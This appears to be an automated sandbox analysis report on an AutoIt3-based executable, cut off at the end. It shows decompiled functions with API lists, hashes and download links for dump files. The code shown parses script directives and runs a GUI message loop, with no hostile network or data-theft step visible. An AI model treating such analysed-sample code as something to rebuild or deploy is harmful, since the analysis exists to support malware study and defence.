                            • Instruction Fuzzy Hash: 832188768002056BDF11DF54DC84FEAB7B8EB49300F10859DF54A9B141EB755B95CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9EE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(uxtheme.dll,00A9EE15,00A9D92E), ref: 00A9EE3B
                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00A9EE4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsThemeActive$uxtheme.dll
                            • API String ID: 2574300362-3542929980
                            • Opcode ID: dac73716dd018b0b81cb070e33baf650187901d91a94bfbe4d46c07b661519c5
                            • Instruction ID: 94c4fc0e7558f0f3fe9ffa3d9cff526158cb65575992c5fa25f3e1a93674e3a9
                            • Opcode Fuzzy Hash: dac73716dd018b0b81cb070e33baf650187901d91a94bfbe4d46c07b661519c5
                            • Instruction Fuzzy Hash: E2D0C9B9A00703EEDF348F21D80964277E4BB00B41F508868A5A1D2160DF74C480CA28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 00AC39AC
                            • FindFirstFileW.KERNEL32(?,?), ref: 00AC39BD
                            • FindClose.KERNEL32(00000000), ref: 00AC39D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 9fa978207105be615f7bb22271435fefabf0ea4b57fea8c4204d41eab7b9ee3c
                            • Instruction ID: ae3cc3312710b17223ec09a2cd38749ce128fcec75fd3b8e13e61205ce346bbe
                            • Opcode Fuzzy Hash: 9fa978207105be615f7bb22271435fefabf0ea4b57fea8c4204d41eab7b9ee3c
                            • Instruction Fuzzy Hash: 5AE09232814518AB8A10AB78FC0D8E97B9CDB06335F408746FE38D31D0DB709AB047D6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                            Download Yara Rule
                            C-Code - Quality: 57%
                            			E00A93C50(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8196;
				void* __ebx;
				void* __edi;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t67;
				intOrPtr _t68;
				signed int _t72;
				intOrPtr _t76;
				signed int _t86;
				char* _t96;
				intOrPtr _t101;
				void* _t116;
				intOrPtr* _t117;
				void* _t119;
				short* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t134 = __fp0;
				_t98 = __ecx;
				E00AB2160(0x2004);
				_t120 = _a4;
				if( *_t120 == 0x23) {
					_t96 = __ecx;
					_t44 = E00AA333F(_t120, L"#notrayicon", 0xb);
					_t124 = _t123 + 0xc;
					__eflags = _t44;
					if(_t44 != 0) {
						_t45 = E00AA333F(_t120, L"#requireadmin", 0xd);
						_t125 = _t124 + 0xc;
						__eflags = _t45;
						if(_t45 != 0) {
							_t46 = E00AA333F(_t120, L"#NoAutoIt3Execute", 0xd);
							_t126 = _t125 + 0xc;
							__eflags = _t46;
							if(_t46 != 0) {
								_t47 = E00AA333F(_t120, L"#OnAutoItStartRegister", 0x16);
								_t127 = _t126 + 0xc;
								__eflags = _t47;
								if(__eflags != 0) {
									_t48 = E00AA333F(_t120, L"#include-once", 0xd);
									_t128 = _t127 + 0xc;
									__eflags = _t48;
									if(_t48 != 0) {
										_t49 = E00AA333F(_t120, L"#include", 8);
										_t129 = _t128 + 0xc;
										__eflags = _t49;
										if(_t49 != 0) {
											_t50 = E00AA333F(_t120, L"#comments-start", 0xf);
											_t130 = _t129 + 0xc;
											__eflags = _t50;
											if(__eflags == 0) {
												L28:
												_t117 = _a12;
												_a4 = 1;
												while(1) {
													_t51 = E00AFFD26(__eflags, _a16, _t120); // executed
													__eflags = _t51;
													if(__eflags == 0) {
														break;
													}
													 *_t117 =  *_t117 + 1;
													E00AD4AA0(_t98, __eflags, _t120);
													E00AD4A44(_t98, _t120);
													_t58 = E00AA333F(_t120, L"#comments-start", 0xf);
													_t130 = _t130 + 0xc;
													__eflags = _t58;
													if(__eflags == 0) {
														L36:
														_a4 = _a4 + 1;
														continue;
													}
													_t59 = E00AA333F(_t120, L"#cs", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t59;
													if(__eflags == 0) {
														goto L36;
													}
													_t60 = E00AA333F(_t120, L"#comments-end", 0xd);
													_t130 = _t130 + 0xc;
													__eflags = _t60;
													if(_t60 == 0) {
														L34:
														_t62 = _a4 - 1;
														_a4 = _t62;
														__eflags = _t62;
														if(__eflags > 0) {
															continue;
														}
														return 1;
													}
													_t64 = E00AA333F(_t120, L"#ce", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t64;
													if(__eflags != 0) {
														continue;
													}
													goto L34;
												}
												__eflags = _a4;
												if(__eflags <= 0) {
													L5:
													return 1;
												}
												E00AE3F89(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
												return 0;
											}
											_t65 = E00AA333F(_t120, L"#cs", 3);
											_t130 = _t130 + 0xc;
											__eflags = _t65;
											if(__eflags != 0) {
												goto L5;
											}
											goto L28;
										}
										_push( &_v8196);
										_push(_t120 + 0x10);
										_push(_t96);
										_t67 = E00AD4AE1();
										_t101 = _a8;
										__eflags = _t67 - 1;
										_t68 =  *_a12;
										if(__eflags != 0) {
											E00AE3F89(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
											return 0;
										}
										_push(_t68);
										_push(_t120);
										_push(_t101);
										_push(E00A9F290(_t96,  &_v8196, _t116));
										_push( &_v8196);
										_push(_t96);
										_t72 = E00A935F0( &_v8196, __fp0);
										__eflags = _t72;
										return 0 | _t72 != 0x00000000;
									}
									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
										goto L5;
									}
									_t121 = 0;
									__eflags = 0;
									while(1) {
										_t76 = E00AA13CB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
										_t128 = _t128 + 8;
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										_t121 = _t121 + 1;
										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
											continue;
										}
										return 1;
									}
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
								}
								_t122 = E00A9F260(_t120 + 0x2c, __eflags);
								E00AD4A44(_t98, _t122);
								E00AD4AA0(_t98, __eflags, _t122);
								_t86 = E00AA10E1(_t122);
								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
									_push(_t122);
								} else {
									_t8 = _t122 + 2; // 0x2
									_t119 = _t8;
									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
									E00AD4A44(0, _t119);
									E00AD4AA0(0, __eflags, _t119);
									_push(_t119);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
								_push(_t122);
								E00AA10FC();
								return 1;
							}
							 *((char*)(_t96 + 2)) = 1;
							return 1;
						}
						 *((char*)(_t96 + 1)) = 1;
						return 1;
					}
					 *_t96 = 1;
					goto L5;
				}
				return 3;
			}









































                            0x00a93c50
                            0x00a93c50
                            0x00a93c58
                            0x00a93c5f
                            0x00a93c67
                            0x00ab8390
                            0x00ab8392
                            0x00ab8397
                            0x00ab839a
                            0x00ab839c
                            0x00ab83b3
                            0x00ab83b8
                            0x00ab83bb
                            0x00ab83bd
                            0x00ab83d5
                            0x00ab83da
                            0x00ab83dd
                            0x00ab83df
                            0x00ab83f7
                            0x00ab83fc
                            0x00ab83ff
                            0x00ab8401
                            0x00ab846b
                            0x00ab8470
                            0x00ab8473
                            0x00ab8475
                            0x00ab84cb
                            0x00ab84d0
                            0x00ab84d3
                            0x00ab84d5
                            0x00ab853b
                            0x00ab8540
                            0x00ab8543
                            0x00ab8545
                            0x00ab855f
                            0x00ab855f
                            0x00ab8562
                            0x00ab8569
                            0x00ab856e
                            0x00ab8573
                            0x00ab8575
                            0x00000000
                            0x00000000
                            0x00ab8577
                            0x00ab857a
                            0x00ab8580
                            0x00ab858d
                            0x00ab8592
                            0x00ab8595
                            0x00ab8597
                            0x00ab85ea
                            0x00ab85ea
                            0x00000000
                            0x00ab85ea
                            0x00ab85a1
                            0x00ab85a6
                            0x00ab85a9
                            0x00ab85ab
                            0x00000000
                            0x00000000
                            0x00ab85b5
                            0x00ab85ba
                            0x00ab85bd
                            0x00ab85bf
                            0x00ab85d5
                            0x00ab85d8
                            0x00ab85d9
                            0x00ab85dc
                            0x00ab85de
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ab85e0
                            0x00ab85c9
                            0x00ab85ce
                            0x00ab85d1
                            0x00ab85d3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ab85d3
                            0x00ab85f2
                            0x00ab85f6
                            0x00ab83a1
                            0x00000000
                            0x00ab83a1
                            0x00ab860a
                            0x00000000
                            0x00ab860f
                            0x00ab854f
                            0x00ab8554
                            0x00ab8557
                            0x00ab8559
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ab8559
                            0x00ab84dd
                            0x00ab84e1
                            0x00ab84e2
                            0x00ab84e3
                            0x00ab84eb
                            0x00ab84ee
                            0x00ab84f0
                            0x00ab84f2
                            0x00ab8527
                            0x00000000
                            0x00ab852c
                            0x00ab84f4
                            0x00ab84f5
                            0x00ab84f6
                            0x00ab8502
                            0x00ab8509
                            0x00ab850a
                            0x00ab850b
                            0x00ab8512
                            0x00000000
                            0x00ab8517
                            0x00ab8477
                            0x00ab847a
                            0x00000000
                            0x00000000
                            0x00ab8480
                            0x00ab8480
                            0x00ab8482
                            0x00ab848f
                            0x00ab8494
                            0x00ab8497
                            0x00ab8499
                            0x00000000
                            0x00000000
                            0x00ab849b
                            0x00ab849c
                            0x00ab849f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ab84a1
                            0x00ab84b3
                            0x00000000
                            0x00ab84bd
                            0x00ab840b
                            0x00ab840e
                            0x00ab8414
                            0x00ab841a
                            0x00ab8422
                            0x00ab8428
                            0x00ab8443
                            0x00ab842a
                            0x00ab842c
                            0x00ab842c
                            0x00ab8430
                            0x00ab8435
                            0x00ab843b
                            0x00ab8440
                            0x00ab8440
                            0x00ab844e
                            0x00ab8450
                            0x00ab8451
                            0x00000000
                            0x00ab8459
                            0x00ab83e1
                            0x00000000
                            0x00ab83e5
                            0x00ab83bf
                            0x00000000
                            0x00ab83c3
                            0x00ab839e
                            0x00000000
                            0x00ab839e
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-3360698832
                            • Opcode ID: 87addde649b9cf8c94c02b29522d8d94caaca7202f2e627b9cfac5f6f21b38ce
                            • Instruction ID: 07681800d1d4b179da633932f6656ff92491d7f7af02e0fed08f09584065eb6a
                            • Opcode Fuzzy Hash: 87addde649b9cf8c94c02b29522d8d94caaca7202f2e627b9cfac5f6f21b38ce
                            • Instruction Fuzzy Hash: 9261E672641B15A7EF20AB248D42FEF33AC9F55740F404065FC06AF283EB75EA45C6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A99430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00A99430(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v152;
				int _v156;
				char _v164;
				struct tagMSG _v188;
				struct HWND__* _v192;
				int _v196;
				struct HWND__* _v204;
				char _v208;
				struct HWND__* _v220;
				struct tagMSG _v244;
				char _v248;
				char _v252;
				long _v256;
				long _v260;
				struct HWND__* _v264;
				int _v268;
				struct HWND__* _v272;
				signed int _v276;
				char _v277;
				char _v288;
				int _v292;
				struct HWND__* _v300;
				struct HWND__* _v304;
				struct HWND__* _v308;
				struct tagMSG* _v312;
				char _v316;
				long _v324;
				signed int _v328;
				char _v329;
				struct HWND__* _v332;
				struct tagMSG* _v336;
				void* __ebx;
				void* __edi;
				signed int __esi;
				intOrPtr _t280;
				int _t282;
				intOrPtr _t283;
				struct tagMSG* _t285;
				struct HWND__* _t291;
				struct HWND__* _t295;
				intOrPtr* _t297;
				struct HWND__* _t299;
				struct HWND__* _t302;
				struct HWND__* _t307;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t336;
				struct HWND__* _t337;
				struct HWND__* _t338;
				struct HWND__* _t342;
				struct HWND__* _t347;
				void* _t349;
				struct HWND__* _t355;
				struct tagMSG* _t358;
				long _t359;
				void* _t368;
				void* _t379;
				void* _t380;
				struct tagMSG* _t384;
				signed int _t385;
				void* _t400;
				signed int _t403;
				void* _t405;
				int _t406;
				void* _t407;
				struct HWND__* _t414;
				int _t415;
				struct HWND__* _t417;
				struct HWND__* _t423;
				intOrPtr _t431;
				struct HWND__* _t437;
				struct HWND__* _t442;
				intOrPtr _t460;
				void* _t462;
				struct tagMSG* _t467;
				signed int _t480;
				struct tagMSG* _t511;
				signed int _t545;
				void* _t549;
				struct tagMSG** _t552;
				struct HWND__** _t553;
				struct tagMSG* _t560;
				struct HWND__* _t564;
				struct HWND__* _t565;
				signed int _t566;
				signed int _t570;
				struct HWND__** _t572;
				void* _t598;

				_t606 = __fp0;
				_t511 = __edx;
				_t471 = __ecx;
				_t572 = (_t570 & 0xfffffff8) - 0x14c;
				_t533 = __ecx;
				_t280 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t280 >= 0xf3c) {
					 *0xb274e2 = 0;
					E00AEE724(__fp0, __ecx, 0x9a, 0xffffffff);
					_t282 = 1;
					L33:
					return _t282;
				}
				_t283 = _t280 + 1;
				_v312 = __ecx;
				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
				if(_t283 == 1) {
					E00A9FFF0(__ecx, __fp0);
				}
				_t533[0x51] = 0;
				if(_t533[0x3f] != 0) {
					L30:
					_t285 = _t533[0x3b];
					_t533[0x51] = 0;
					if(_t285 == 1) {
						E00A9FF70(_t471, _t533);
						__eflags = _t533[0x3f] - 1;
						if(__eflags == 0) {
							goto L32;
						}
						E00A91C50(_t533, _t511, __eflags, _t606);
						LockWindowUpdate(0);
						DestroyWindow( *0xb27518); // executed
						_t291 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t291;
						if(_t291 <= 0) {
							goto L32;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t295 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t295;
						} while (_t295 > 0);
						goto L32;
					} else {
						_t533[0x3b] = _t285 - 1;
						L32:
						_t282 = 0;
						goto L33;
					}
				} else {
					while(_t533[0x51] == 0) {
						if( *0xb274e3 != 0) {
							L10:
							if( *0xb38624 != 0) {
								_t297 =  *0xb38628; // 0x0
								_t460 =  *_t297;
								E00AC1D6C();
								_t299 = _t533[0x6c];
								_t545 = 0;
								__eflags = _t299;
								if(_t299 == 0) {
									L80:
									__eflags = _t545 - _t299;
									if(__eflags == 0) {
										goto L11;
									}
									E00AF4D61( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
									_t511 = _t533[0x6b];
									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
									_v276 =  &(_v276->i);
									E00A9DE00( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
									E00B0D2F8( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
									L29:
									if(_t533[0x3f] == 0) {
										continue;
									}
									goto L30;
								}
								_t471 = _t533[0x6b];
								do {
									_t511 = _t471->hwnd;
									__eflags = _t511->hwnd;
									if(_t511->hwnd == 0) {
										goto L79;
									}
									_t511 = _t511->hwnd;
									__eflags = _t511->hwnd - _t460;
									if(_t511->hwnd == _t460) {
										goto L80;
									}
									L79:
									_t545 = _t545 + 1;
									_t471 =  &(_t471->message);
									__eflags = _t545 - _t533[0x6c];
								} while (_t545 < _t533[0x6c]);
								goto L80;
							}
							L11:
							if( *0xb274ec == 1) {
								__eflags =  *0xb274e3;
								if( *0xb274e3 != 0) {
									goto L12;
								}
								Sleep(0xa);
								goto L29;
							}
							L12:
							if(_t533[0x118] != 0) {
								__eflags =  *0xb3954c;
								if( *0xb3954c != 0) {
									goto L13;
								}
								_t467 = _t533[0x116];
								 *0xb3954c = 1;
								_v308 = 0;
								_v328 = _t467;
								while(1) {
									_t511 =  &_v328;
									 *_t572 = 0;
									_t329 = E00AD07BC(_t511, _t471);
									__eflags = _t329;
									if(_t329 == 0) {
										goto L93;
									}
									_t347 = _t467->hwnd;
									__eflags =  *((char*)(_t347 + 0x11));
									if( *((char*)(_t347 + 0x11)) != 0) {
										L92:
										_t471 =  &_v324;
										E00AD07CE( &_v328,  &_v324);
										_t467 = _v336;
										continue;
									}
									_v324 = _t347;
									_t349 = E00A9C870( *((intOrPtr*)(_t347 + 0x14)));
									__eflags = _t511;
									if(__eflags < 0) {
										goto L92;
									}
									if(__eflags > 0) {
										L91:
										_v308 =  &(_v308->i);
										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
										E00AF4D61(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
										_t355 =  &(_v272->i);
										__eflags = _t355;
										_v272 = _t355;
										 *((char*)(_t467->hwnd + 0x10)) = 1;
										E00B0D2F8(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0); // executed
										 *((char*)(_t467->hwnd + 0x10)) = 0;
										goto L92;
									}
									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
									if(__eflags < 0) {
										goto L92;
									}
									goto L91;
								}
								while(1) {
									L93:
									_v328 = _t533[0x116];
									while(1) {
										L94:
										_t471 =  &_v328;
										 *_t572 = 0;
										_t331 = E00AD07BC( &_v328,  &_v328);
										__eflags = _t331;
										if(_t331 == 0) {
											break;
										}
										_t511 = _v328;
										_t342 = _t511->hwnd;
										__eflags =  *((char*)(_t342 + 0x11));
										if( *((char*)(_t342 + 0x11)) != 0) {
											E00AE2129( &(_t533[0x116]),  &_v328);
											L93:
											_v328 = _t533[0x116];
											continue;
										}
										_t471 =  &_v324;
										_t511 =  &_v328;
										E00AD07CE(_t511,  &_v324);
									}
									__eflags = _v308;
									 *0xb3954c = 0;
									if(_v308 > 0) {
										goto L29;
									}
									goto L13;
								}
							}
							L13:
							if( *0xb3863c != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L14;
								}
								__eflags =  *0xb38668 - 1;
								if( *0xb38668 == 1) {
									goto L14;
								}
								E00AD7DD1( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t302 = E00AE1700(0xb38630, _t511);
									__eflags = _t302;
									if(_t302 == 0) {
										break;
									}
									__eflags = E00AC4A5A( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t307 = E00AF4D61( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
									__eflags = _t307;
									if(_t307 == 0) {
										continue;
									}
									_v300 = 0;
									_v292 = 1;
									_v288 = 0;
									E00A99190(1,  &_v300);
									_v292 = 1;
									_v300 = _v244.hwnd;
									E00A91D10(L"@GUI_CTRLID",  &_v96, __eflags);
									E00A91BE0(2, 1,  &_v300,  &_v96);
									E00A92480( &_v96);
									E00A99190(L"@GUI_CTRLID",  &_v300);
									_v292 = 7;
									_v300 = _v244.pt;
									E00A91D10(L"@GUI_WINHANDLE",  &_v64, __eflags);
									E00A91BE0(2, 1,  &_v300,  &_v64);
									E00A92480( &_v64);
									E00A99190(L"@GUI_WINHANDLE",  &_v300);
									_t536 = L"@GUI_CTRLHANDLE";
									_t559 =  &_v48;
									_v292 = 7;
									_v300 = _v220;
									E00A91D10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
									_t511 =  &_v300;
									E00A91BE0(2, 1, _t511,  &_v48);
									E00A92480( &_v48);
									_t560 = _v312;
									 *((char*)(_t560 + 0x464)) = 1;
									E00B0D2F8(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
									 *((char*)(_t560 + 0x464)) = 0;
									_t553 =  &_v316;
									L108:
									E00A99190(_t536, _t553);
									_t471 =  &(_v244.message);
									E00A92480( &(_v244.message));
									_t533 = _v312;
									goto L29;
								}
								_t471 =  &(_v244.message);
								E00A92480( &(_v244.message));
							}
							L14:
							if(E00A99400(_t511, _t606, _t533) == 1) {
								goto L29;
							}
							if( *0xb387b0 != 0) {
								__eflags = _t533[0x119] - 1;
								if(_t533[0x119] == 1) {
									goto L16;
								}
								E00AD7DD1( &_v244);
								while(1) {
									_t511 =  &_v244;
									_t437 = E00AE3B3B(0xb38710, _t511);
									__eflags = _t437;
									if(_t437 == 0) {
										break;
									}
									__eflags = E00AC4A5A( &(_v244.message));
									if(__eflags != 0) {
										continue;
									}
									_t442 = E00AF4D61( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
									__eflags = _t442;
									if(_t442 == 0) {
										continue;
									}
									_v204 = 0;
									_v196 = 1;
									_v192 = 0;
									E00A99190(1,  &_v204);
									_v196 = 1;
									_t536 = L"@TRAY_ID";
									_v204 = _v244.hwnd;
									E00A91D10(L"@TRAY_ID",  &_v80, __eflags);
									_t511 =  &_v204;
									E00A91BE0(2, 1, _t511,  &_v80);
									E00A92480( &_v80);
									_t552 = _v312;
									__eflags = _v188.pt + 1;
									_t552[0x119] = 1;
									E00B0D2F8(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
									_t552[0x119] = 0;
									_t553 =  &_v220;
									goto L108;
								}
								_t471 =  &(_v244.message);
								E00A92480( &(_v244.message));
							}
							L16:
							_t358 = _t533[0x3e];
							if(_t358 == 7) {
								_t511 = _t533[0x114];
								_t359 = WaitForSingleObject(_t511, 0xa);
								_v256 = _t359;
								__eflags = _t359 - 0x102;
								if(_t359 != 0x102) {
									GetExitCodeProcess(_t533[0x114],  &_v256);
									_t511 = _t533[0x114];
									CloseHandle(_t511);
									_v324 = _v256;
									_t471 = _t533 +  *_t533->message;
									E00A9D620( &_v324, _t533 +  *_t533->message);
									_t533[0x51] = 1;
									_t533[0x3e] = 0;
								}
								goto L29;
							}
							if(_t358 == 8 || _t358 == 9) {
								Sleep(0xa);
								__eflags = _t533[0x112];
								if(_t533[0x112] == 0) {
									__eflags = 0;
									L127:
									_t511 = _t533[0x10e];
									_t471 =  &_v304;
									E00AD3C1D(_t511,  &_v304,  &_v329);
									_t572 =  &(_t572[3]);
									__eflags = _t533[0x3e] - 9;
									if(_t533[0x3e] != 9) {
										__eflags = _v329 - 1;
										if(_v329 != 1) {
											goto L29;
										}
										_t462 = 0;
										__eflags = 0;
										L133:
										_t368 = _t533[0x115];
										_v260 = 0xcccccccc;
										__eflags = _t368 - _t462;
										if(_t368 != _t462) {
											GetExitCodeProcess(_t368,  &_v260);
											CloseHandle(_t533[0x115]);
											_t533[0x115] = _t462;
										}
										__eflags = _t533[0x3e] - 8;
										if(_t533[0x3e] != 8) {
											_t511 =  *_t533;
											_t471 = _v260;
											__eflags = _t533 + _t511->message;
											E00A93F00(_t533 + _t511->message, _v260, _t462);
										} else {
											asm("fild dword [esp+0x2c]");
											__eflags = _v304;
											if(_v304 < 0) {
												_t606 = _t606 +  *0xb1cd00;
											}
											_t511 =  *_t533;
											_v324 = _t606;
											_t471 =  &_v324;
											E00AE742B(_t533 + _t511->message,  &_v324);
										}
										_t533[0x51] = 1;
										_t533[0x3e] = _t462;
										Sleep(_t533[0xbd]);
										goto L29;
									}
									__eflags = _v329;
									if(_v329 != 0) {
										_v329 = 0;
										goto L29;
									}
									_v329 = 1;
									goto L133;
								}
								_t379 = E00A9C870(_t533[0x113]);
								_t462 = 0;
								__eflags = _t511;
								if(__eflags < 0) {
									goto L127;
								}
								if(__eflags > 0) {
									L123:
									_t380 = _t533[0x115];
									__eflags = _t380 - _t462;
									if(_t380 != _t462) {
										CloseHandle(_t380);
										_t533[0x115] = _t462;
									}
									_t511 =  *_t533;
									_t471 = _t533 + _t511->message;
									_v324 = _t462;
									E00A9D620( &_v324, _t533 + _t511->message);
									goto L66;
								}
								__eflags = _t379 - _t533[0x112];
								if(_t379 < _t533[0x112]) {
									goto L127;
								}
								goto L123;
							} else {
								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
									Sleep(0xa); // executed
									__eflags = _t533[0xbc];
									if(_t533[0xbc] == 0) {
										L56:
										_t384 = _t533[0x3e];
										__eflags = _t384 - 3;
										if(_t384 < 3) {
											goto L29;
										}
										_t385 = _t384 - 3;
										__eflags = _t385 - 3;
										if(__eflags > 0) {
											goto L29;
										} else {
											switch( *((intOrPtr*)(_t385 * 4 +  &M00ABE113))) {
												case 0:
													__eax = E00AFF356(__ecx, __fp0, __edi, 1);
													goto L149;
												case 1:
													__eax = E00AFF356(__ecx, __fp0, __edi, 1);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														goto L150;
													}
													if(__eflags <= 0) {
														goto L153;
													}
													goto L29;
												case 2:
													_t386 = E00AFFD79(__eflags, _t606, _t533);
													L149:
													_t547 = _t386;
													__eflags = _t547;
													if(__eflags >= 0) {
														goto L151;
													}
													goto L150;
												case 3:
													__eax = E00AFFD79(__eflags, __fp0, __edi);
													__esi = __eax;
													__eflags = __esi;
													if(__eflags < 0) {
														L150:
